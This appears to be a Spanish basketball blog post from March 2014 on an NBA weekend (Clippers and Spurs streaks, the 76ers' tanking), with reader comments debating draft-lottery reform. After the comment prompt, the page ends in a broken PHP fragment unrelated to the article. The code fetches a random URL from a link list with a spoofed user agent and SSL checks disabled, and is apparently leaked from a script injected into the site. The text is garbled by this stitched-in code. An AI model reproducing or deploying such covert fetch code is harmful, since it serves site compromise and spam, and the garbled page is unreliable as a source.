Informe del fin de semana: Los Clippers se unen a la lucha por el num. 1

17 de March de 2014 por MagicJohnson32

El fin de semana arrancó con una jornada del viernes bastante rutinaria, con las excepciones de las victorias foráneas de Nuggets y Cavs en Miami y Oakland respectivamente. Los Heat no solo no han aprovechado los tropiezos recientes de los Pacers, sino que se han alejado de la cabeza de la conferencia Este a poco que Indiana ha enderezado el rumbo. La franquicia comandada por Larry Bird sacó adelante sus dos compromisos ante Sixers y Pistons, no sin ciertos apuros, y parece que las aportaciones de Turner y Bynum pueden dar el plus que le faltó a este equipo en pasados Playoffs. Mencionaremos por segunda y última vez en esta crónica a los 76ers para destacar que, con el partido que perdieron el sábado contra los Grizzlies, ya suman 20 derrotas consecutivas. Y, así, niños y niñas, es como se tankea. 

En el extremo opuesto del espectro competitivo se sitúan los Spurs, aúpados a lo alto de la conferencia Oeste después de triturar a los Lakers en un partido sentenciado desde el mismo salto inicial y que alcanzaron la decena de victorias consecutivas anoche frente Utah. Ojo también con los Clippers, que acumulan once victorias consecutivas tras ganar este fin de semana a Jazz y Cavaliers y presentan ya su candidatura al cetro de la regular season pues tienen a los Thunder a tiro de piedra. Russell Westbrook descansó anoche y los Mavs, con un destacado Jose Calderón, les pasaron por encima en su propia casa. Los que parece que se nos caen de entre los aspirantes son los Rockets, perdedores anoche en Miami de su tercer partido seguido y que suficiente tendrán con defender la cuarta plaza y la consiguiente ventaja de campo en primera ronda. De todas manera a Houston le beneficiará la dura lucha que se lleva a cabo detrás suyo. En quinta posición se sitúan los Blazers, que sobrevivieron a la baja de Aldridge en New Orleans pese a la mejor marca anotadora de Anthony Davis (marca que solo ha duró un par de días pues ayer el ala-pívot de los Pelicans anotó 40 puntos y capturó 20 rebotes ante los Celtics) pero no pudieron imponerse a los Warriors anoche a pesar de llegar a ganar de 18 puntos durante la primera parte. Golden State, Dallas y Memphis no pierden de vista a los Suns, novenos, que salen del fin de semana como unos de los triunfadores con dos meritorias victorias en Boston y Toronto.

Uno de los frentes de la competición que en los últimos días ha ganado brillo es el de la 8ª posición del Este. Los Pistons no levantan cabeza pero, en cambio, Atlanta ha frenado su caída libre (ganó el sábado a los Nuggets) y tanto Knicks como Cavs conservan esperanzas de Playoffs. Los neoyorquinos dieron la bienvenida a Phil Jackson con una cómoda victoria el sábado ante los inofensivos Bucks, que se las están apañando para mantener el peor balance de la liga.

Comenta

14 comentarios a esta entrada

  1. Denise dice:
    #1

    Lo de los 76ers es una verguenza. Lo siento por el chaval que pille en el Draft pero espero que sea un fracaso al menos durante su etapa 76ers. La liga debería hacer algo al respecto. No se puede dejar que un equipo que ya era malo a principios de año, traspase a 2 de sus 4 mejores jugadores en febrero a cambio de nada.
    Y a MCW le dejaría sin ROY. Es verdad que por números es el legitimo ROY; pero sus estadísticas están muy infladas jugando en un equipo lleno de mierda donde tira todo lo que le da la gana y el balón pasa todo el rato por sus manos.

      Citar

  2. Jose Luis dice:
    #2

    Perdo Denise, el chaval no tiene culpa de eso.

    Ni MCW, ni el próximo que pillen en el draft.

    Quizá el año que viene les veamos por play-offs eh? MCW, Wroten, Noel, Young, el que pillen del draft… desde luego tienen un equipo en crecimiento, ¿lo gestionarán bien?

      Citar

  3. Vader dice:
    #3

    Los septimos y octavos de cada conferencia y todos los que no se clasifican por playoff deberian tener las mismas opciones en el draft (o algo parecido). Así el draft seguiria equilibrandonla liga pero sin que sirviera de nada hacer tanto tanking y regalar jugadores. El traspaso de Turner fue una verguenza para la liga, mucho peor que el de Pau Gasol en su día.

    Saludos

      Citar

  4. Jose Luis dice:
    #4

    Pues el de Bynum tampoco queda muy atrás xd

      Citar

  5. Jose Luis dice:
    #5

    No sé, a mí si me gusta que haya variedad de objetivos y planteamientos. También hay que ser buen GM para quitarte tus contratos, o para conseguir lo que buscas, y no siempre es fácil. Muchos contratos no se movieron a pesar del interés que se supone había en ello.

    Philadelphia estuvo muchos años batallando entre el 10º y el 5º, sin opciones de anillo. Creo que al menos 4-5 temporadas.

      Citar

  6. Denise dice:
    #6

    Jose Luis:
    Perdo Denise, el chaval no tiene culpa de eso.

    Ni MCW, ni el próximo que pillen en el draft.

    Quizá el año que viene les veamos por play-offs eh? MCW, Wroten, Noel, Young, el que pillen del draft… desde luego tienen un equipo en crecimiento, ¿lo gestionarán bien?

    Ya sé que no tienen culpa, y por supuesto que Philly debería hacer playoffs el proximo año. Si no estoy mal informado, tienen 2 primeras rondas y 5 segundas rondas en el proximo Draft más como 30 millones para fichar. El GM ha hecho un buen trabajo de reconstrucción y en verdad ha jugado “limpio” sin saltarse ninguna ley, pero es una verguenza la imagen del equipo (y de la NBA por permitir esto)

    Cada vez tengo más claro que los 14 equipos que no van a PO, deberían tener las mismas probabilidades de llevarse tanto el pick 1 como el pick 14.

      Citar

  7. HisRoyalAirness dice:
    #7

    Denise no estoy de acuerdo para nada con eso. Ya para empezar ser noveno en este u oeste tiene cero que ver.
    Lo que es vomitivo es lo de los playoffs, en el este sólo 4 equipos están por encima del 50 por ciento. Que vayan los 16 mejores y ya por favor. In Silver we trust.
    las dos primeras rondas del este son una puñetera broma, todos sabemos ya la final de conferencia

      Citar

  8. Jose Luis dice:
    #8

    ¿Y si el que más probabilidades tuviese de llevarse el pick1 fuera el 12 de la conferencia, en lugar del 15?

    luego tendrian mismas opciones 11-13, 10-14, 9-15

    O bueno, como los picks es en global de toda la NBA y no conferencia, pues los número 23 y 24 segun balance.

    Lo comento más que nada para que le saquéis errores al sistema, que ven más 30 ojos que 2 xddd

      Citar

  9. Denise dice:
    #9

    Jose Luis:
    ¿Y si el que más probabilidades tuviese de llevarse el pick1 fuera el 12 de la conferencia, en lugar del 15?

    luego tendrian mismas opciones 11-13, 10-14, 9-15

    O bueno, como los picks es en global de toda la NBA y no conferencia, pues los número 23 y 24 segun balance.

    Lo comento más que nada para que le saquéis errores al sistema, que ven más 30 ojos que 2 xddd

    No, Yo lo que quiero decir es que haya un sorteo puro entre los 14 equipos que no se clasifican para PO y todos tengan las mismas probabilidades de llevarse el pick 1, 2, 3, 4, 5….asi hasta llegar al 14.

      Citar

  10. Jose Luis dice:
    #10

    Ya, pero eso no lo veo justo, en el oeste hay equipos bastante buenos que quedarán fuera, y si encima le das un pick1…

    Que os parece lo mio? Habría competitividad… como mucho, un equipo que quede eliminado de PO a falta de 5 partidos, podría intentar “colocarse bien”, pero serían muchos equipos involucrados y no solo los 3-4 ultimos. Además, los últimos tendrían que tratar de ganar para tener un buen pick.

      Citar

  11. Vader dice:
    #11

    Yo soy más partidario de algo parecido a: A partir del 5o clasificado en cada conferencia mismas posibilidades, o muy parecidas, en el draft. Todos los equipos intentarian tener el mejor equipo posible cada año y sólo se “penalizaria” a los cuatro mejores de cada conferencia que mirando la tabla esta claro que no necesitan refuerzos via draft.

    A partir de ahí un equipo sólo haria traspasos para fichar peores jugadores si estos fueran expirings, no habria el incentivo añadido de mejorar posiciones en el draft siguiente.

    Saludos

      Citar

  12. Sancho88 dice:
    #12

    Una solución atractiva sería que los equipos que no jueguen playoffs disputen un torneo a eliminatorias, tipo copa del rey, para disputarse el número uno del draft. Según cómo quedes en ese torneo así queda determinada tu posición en el draft. De esta manera, los equipos malos tendrían que competir para lograr su objetivo, y no simplemente dejarse llevar durante toda la temporada perdiendo el máximo número de partidos posibles. Al menos le daría algo de emoción y competitividad, y nadie destrozaría su plantilla a mitad de febrero porque luego en ese formato copa no podría pasar de primera ronda y por tanto se llevaría el Pick 15 o 16. Vamos, creo que sería algo divertido de ver y muy emocionante. El formato copa del rey de la ACB triunfa aquí, apetece verlo y allí tal y como montan los torneos y espectáculos sería genial. Luego pones un nombre chulo al torneo como NBA Top Rookie Tournament, los reunes en una ciudad neutra y en una semana enfrentas a 14 equipos, o a los 8 peores equipos o algo así a eliminatorias directas a por el número 1. Ya veríamos como se acababan las chorradas

      Citar

  13. Jose Luis dice:
    #13

    Sancho, se me ocurre que el Oeste sería cada vez más fuerte xD

    El noveno del Oeste podría ganar esa copa 5 de cada 10 veces, y el Oeste se la llevaría 9 de cada 10.

      Citar

  14. Sancho88 dice:
    #14

    Pues que espabile el Este. Siempre van a tankear cinco o seis equipos de media, es un cachondeo.

    Señor Anthony Davis. El MIP se le queda tan pequeño que yo digo que se merece quinteto de la temporada junto a Blake Griffin. Supongo que pondrán a Aldridge con Griffin, pero Davis segundo quinteto seguro, de ahí no baja. Y además del MIP y segundo quinteto, el DPY también podría ser para él. No sé, no a lo mejor se queda solo con el MIP por ser muy joven, y en el quinteto de la temporada también lo va a tener difícil porque no solo están Griffin y Aldridge, sino Love y Noah. La verdad que está siendo un año espectacular a nivel individual. El rendimiento de gente como Durant, LeBron, Griffin, Love, Aldridge, Carmelo, Anthony Davis, Paul George, Joakim Noah o Al Jefferson es muy difíciil de superar puesto por puesto y en estadísticas. Son genios todos ellos. Wall y Paul también, y Cousins ídem. Y dicen que está mal la NBA…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>